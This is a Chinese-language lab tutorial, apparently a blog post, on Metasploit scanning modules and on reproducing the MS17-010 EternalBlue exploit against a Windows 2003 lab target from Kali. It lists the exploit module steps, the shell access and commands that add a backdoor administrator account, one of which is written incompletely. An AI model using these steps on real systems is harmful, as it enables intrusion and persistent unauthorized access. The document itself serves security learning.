ms17_010利用与复现

Msf常见模块使用

1. Metasploit 主机扫描

使用metasploit中的modules/auxiliary/scanner/discovery中的arp_sweep或者udp_sweep

arp_sweep使用ARP请求本地局域网中的所有活跃主机

配置选项

检测到的主机

metasploit中的auxiliary/scanner/portscan中的扫描器进行端口扫描

ftpbounce:通过FTP BOUNCE攻击的原理对TCP服务进行枚举;

xmas:一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤;

ack:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测;

tcp:通过一次完整的TCP链接来判断端口是否开放

syn:使用发送TCP SYN标志的方式探测开放的端口

使用auxiliary/scanner/portscan/tcp 来进行端口扫描

配置选项,查看结果

2.永恒之蓝漏洞利用与复现

靶场环境

一台Kali作为攻击机

一台 win2003作为靶机

Msf中同样可以使用nmap

nmap –script=vuln 192.168.206.136 //找出主机存在的漏洞

确定目标主机存在ms17_010漏洞

搜索ms17_010 search ms17_010

3个模块可利用一个个尝试发现2可以用

Use 2 使用后查看配置选项 show options

配置目标主机

Set RHOSTS 192.168.206.136

执行攻击run

攻击完成

Shell得到目标靶机使用chcp 65001 可以解决乱码问题

至此我们可以执行任意操作创建一个用户,并加入到超级管理员组

net user kun kun /add

net localgroup administrators /add

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不要做小白了

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值